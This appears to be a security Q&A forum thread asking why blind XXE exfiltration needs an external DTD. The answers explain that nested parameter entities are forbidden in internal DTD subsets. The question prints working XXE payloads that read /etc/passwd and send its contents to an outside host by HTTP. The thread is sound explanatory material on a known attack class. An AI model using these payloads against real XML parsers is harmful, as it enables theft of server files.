1

A proper blind XXE payload is:-

<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> File stored on http://127.0.0.1/dtd.xml <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">

Now I didn't understand why do we need an External DTD. I have tried to use this below payload as internal dtd.

<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtdcall SYSTEM 'file:///etc/passwd' > <!ENTITY % test "<!ENTITY server SYSTEM 'http://192.168.0.3:808/?%dtdcall;'>">%test; ]><r>&server;</r>

BUT I got an error:- PEReferences forbidden in internal subset in blah blah.

So anyone can explain this?

Improve this question

2 Answers 2

Reset to default
3

Finally, after doing a hard search I come to a point Parameter Entities are not allowed into Internal DTD subset i.e. 

<!DOCTYPE r [ Not allow to set parameteried entity.]

If I am wrong then clarify me. I read that on this XML doc.

Improve this answer
1
0

Interaction with an external DTD is required so that you can use nested parameters. In an internal DTD the following is allowed: <!DOCTYPE alfa [ <!ENTITY bravo "charlie"> ]> However, in an internal DTD the following is not allowed: <!DOCTYPE alfa [ <!ENTITY bravo "charlie"> <!ENTITY delta SYSTEM "http://&bravo;.echo.com"> ]>

The link posted by @act1vand0 tells us this:

External DTD allows us to include one entity inside the second, but it is prohibited in the internal DTD. (https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)

The PortSwigger documentation on blind XXE explains it in further detail:

The preceding technique works fine with an external DTD, but it won't normally work with an internal DTD that is fully specified within the DOCTYPE element. This is because the technique involves using an XML parameter entity within the definition of another parameter entity. Per the XML specification, this is permitted in external DTDs but not in internal DTDs. (Some parsers might tolerate it, but many do not.) (https://portswigger.net/web-security/xxe/blind)

Improve this answer

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.